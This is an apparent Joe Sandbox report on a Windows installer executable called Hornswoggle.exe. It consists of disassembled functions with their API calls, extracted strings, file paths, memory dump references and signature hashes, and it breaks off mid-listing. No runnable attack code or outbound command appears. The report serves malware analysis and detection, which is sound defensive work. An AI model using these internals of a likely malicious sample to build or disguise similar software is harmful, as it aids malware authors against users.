Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 0040406A Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403E47), ref: 00404074

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
Instruction ID: 4b90da896e4fa09681504a9dabf2ba00c57f91177066947fb67d52e8ca440c18
Opcode Fuzzy Hash: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
Instruction Fuzzy Hash: FCA012324040009BCB014B90FE04C457F31A754300701C031E10180030C2310824FF09

Non-executed Functions

Function 004049F9 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A11
GetDlgItem.USER32(?,00000408), ref: 00404A1C
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A66
LoadBitmapA.USER32(0000006E), ref: 00404A79
SetWindowLongA.USER32(?,000000FC,00404FF0), ref: 00404A92
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AA6
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AB8
SendMessageA.USER32(?,00001109,00000002), ref: 00404ACE
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404ADA
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AEC
DeleteObject.GDI32(00000000), ref: 00404AEF
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B1A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B26
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BBB
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BE6
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BFA
GetWindowLongA.USER32(?,000000F0), ref: 00404C29
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C37
ShowWindow.USER32(?,00000005), ref: 00404C48
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D45
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DAA
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DBF
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DE3
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E03
ImageList_Destroy.COMCTL32(00000000), ref: 00404E18
GlobalFree.KERNEL32(00000000), ref: 00404E28
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EA1
SendMessageA.USER32(?,00001102,?,?), ref: 00404F4A
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F59
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F79
ShowWindow.USER32(?,00000000), ref: 00404FC7
GetDlgItem.USER32(?,000003FE), ref: 00404FD2
ShowWindow.USER32(00000000), ref: 00404FD9

Strings

N, xrefs: 00404C83
M, xrefs: 00404BA2
=CQ, xrefs: 00404F7F
, xrefs: 00404FB1

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $=CQ$M$N
API String ID: 1638840714-1800473409
Opcode ID: f71c4aa5fa736d427a4380ee5912dc7cb3dc5a811f5ff7b07bbbad78877c99f0
Instruction ID: 3cd80f6d66a0a8d02be1144e931921fec7cdafd03fadcad4e17be0217faf115b
Opcode Fuzzy Hash: f71c4aa5fa736d427a4380ee5912dc7cb3dc5a811f5ff7b07bbbad78877c99f0
Instruction Fuzzy Hash: 9D026EB0900209AFEB10DF94DD85AAE7BB5FB84315F10813AF611B62E1C7789E42DF58

Function 00404486 Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004044D5
SetWindowTextA.USER32(00000000,?), ref: 004044FF
SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 004045B0
CoTaskMemFree.OLE32(00000000), ref: 004045BB
lstrcmpiA.KERNEL32(Remove folder: ,Festremser Setup: Completed), ref: 004045ED
lstrcatA.KERNEL32(?,Remove folder: ), ref: 004045F9
SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040460B

Part of subcall function 0040563D: GetDlgItemTextA.USER32(?,?,00000400,00404642), ref: 00405650

Part of subcall function 004060CE: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Hornswoggle.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406126
Part of subcall function 004060CE: CharNextA.USER32(?,?,?,00000000), ref: 00406133
Part of subcall function 004060CE: CharNextA.USER32(?,"C:\Users\user\Desktop\Hornswoggle.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406138
Part of subcall function 004060CE: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406148

GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 004046C9
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046E4

Part of subcall function 0040483D: lstrlenA.KERNEL32(Festremser Setup: Completed,Festremser Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
Part of subcall function 0040483D: wsprintfA.USER32 ref: 004048E3
Part of subcall function 0040483D: SetDlgItemTextA.USER32(?,Festremser Setup: Completed), ref: 004048F6

Strings

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises, xrefs: 004045D6
error, xrefs: 0040449F
Festremser Setup: Completed, xrefs: 00404583, 004045E6
=CQ, xrefs: 00404740
A, xrefs: 004045A9
t"Q, xrefs: 0040448C
Remove folder: , xrefs: 004045E7, 004045EC, 004045F7

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: =CQ$A$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$Festremser Setup: Completed$Remove folder: $error$t"Q
API String ID: 2624150263-3952948813
Opcode ID: 270dc7a5b9dcdb78d87257eb559ab6150f0e039b037db56f317b36bf3157eca3
Instruction ID: 175f10717e4f371f028a94a7e43d857af948bb7b3e906aba32508f1788989df3
Opcode Fuzzy Hash: 270dc7a5b9dcdb78d87257eb559ab6150f0e039b037db56f317b36bf3157eca3
Instruction Fuzzy Hash: 27A18FF1900209ABDB11AFA5CC45AAFB7B8EF85314F14843BF601B72D1D77C9A418B69

Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
Instruction ID: 89e5e1f79722e37631beb13baf5993bff89a91e8d172cde9574b2276e59dc765
Opcode Fuzzy Hash: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
Instruction Fuzzy Hash: CCF02072608100AFE700EBB48948AEEB778DF20324F60057BE240A20C1C7B84A849A3A

Function 00404191 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040421C
GetDlgItem.USER32(00000000,000003E8), ref: 00404230
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040424E
GetSysColor.USER32(?), ref: 0040425F
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040426E
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040427D
lstrlenA.KERNEL32(?), ref: 00404280
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040428F
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042A4
GetDlgItem.USER32(?,0000040A), ref: 00404306
SendMessageA.USER32(00000000), ref: 00404309
GetDlgItem.USER32(?,000003E8), ref: 00404334
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404374
LoadCursorA.USER32(00000000,00007F02), ref: 00404383
SetCursor.USER32(00000000), ref: 0040438C
ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 0040439F
LoadCursorA.USER32(00000000,00007F00), ref: 004043AC
SetCursor.USER32(00000000), ref: 004043AF
SendMessageA.USER32(00000111,00000001,00000000), ref: 004043DB
SendMessageA.USER32(00000010,00000000,00000000), ref: 004043EF

Strings

open, xrefs: 00404397
N, xrefs: 00404322
\A@, xrefs: 00404394
=CQ, xrefs: 004041B1
t"Q, xrefs: 004042E5
Remove folder: , xrefs: 0040435F

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: =CQ$N$Remove folder: $\A@$open$t"Q
API String ID: 3615053054-1681758148
Opcode ID: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
Instruction ID: aa20bcc63d66581fa7bbac4c1809bf2e03719b1a0f02ef32c38fc7c0d03722a0
Opcode Fuzzy Hash: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
Instruction Fuzzy Hash: 3D6191B1A40209BBEF109F61DC45F6A7B69FB84714F108036FB01BA2D1C7B8A951CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5

Function 00405BAC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405D3F,?,?), ref: 00405BBB
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405D3F,?,?), ref: 00405BDF
GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405BE8

Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D

GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C05
wsprintfA.USER32 ref: 00405C23
GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405C5E
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C6D
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CA5
SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFB
GlobalFree.KERNEL32(00000000), ref: 00405D0C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D13

Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405ADA
Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC

Strings

NUL, xrefs: 00405BB5
[Rename], xrefs: 00405C8D, 00405C9F
%s=%s, xrefs: 00405C19

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 222337774-4148678300
Opcode ID: 48efe9067dab4c6be72075fa3094db19553ee2d814aebd6cf6e6eb07f6957914
Instruction ID: f02436ff356463cbad731f06bd7f36315381bbfe77d8bed81a3cf794d1fe08c5
Opcode Fuzzy Hash: 48efe9067dab4c6be72075fa3094db19553ee2d814aebd6cf6e6eb07f6957914
Instruction Fuzzy Hash: 2231C274604B597BD2207B615D49F6B3A9CEF45758F24013BF905B22D2DA78AC008EBD

Function 004060CE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Hornswoggle.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406126
CharNextA.USER32(?,?,?,00000000), ref: 00406133
CharNextA.USER32(?,"C:\Users\user\Desktop\Hornswoggle.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406138
CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406148

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004060CF
*?|<>/":, xrefs: 00406116
"C:\Users\user\Desktop\Hornswoggle.exe", xrefs: 0040610A

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2388947975
Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
Instruction ID: f4547238e9b15f098583f6e7a29ad5d1a016b5704a22f35d65a3ab7f018ae362
Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
Instruction Fuzzy Hash: EF1104A18043A22DFB3246284C44B77AF884F5A764F19407BE4C6763C3CA7C9C52866D

Function 004040AF Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004040CC
GetSysColor.USER32(00000000), ref: 004040E8
SetTextColor.GDI32(?,00000000), ref: 004040F4
SetBkMode.GDI32(?,?), ref: 00404100
GetSysColor.USER32(?), ref: 00404113
SetBkColor.GDI32(?,?), ref: 00404123
DeleteObject.GDI32(?), ref: 0040413D
CreateBrushIndirect.GDI32(?), ref: 00404147

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: b9626d203e07c142b7df78836af29c525e1d4ad6db78ea87979aa0b8fd7aa94c
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: 9C219671904704ABC7219F78DD48B4BBBF8AF41714F048529E996F63E0D734E944CB55

Function 00402C17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402C2F
GetTickCount.KERNEL32 ref: 00402C4D
wsprintfA.USER32 ref: 00402C7B

Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
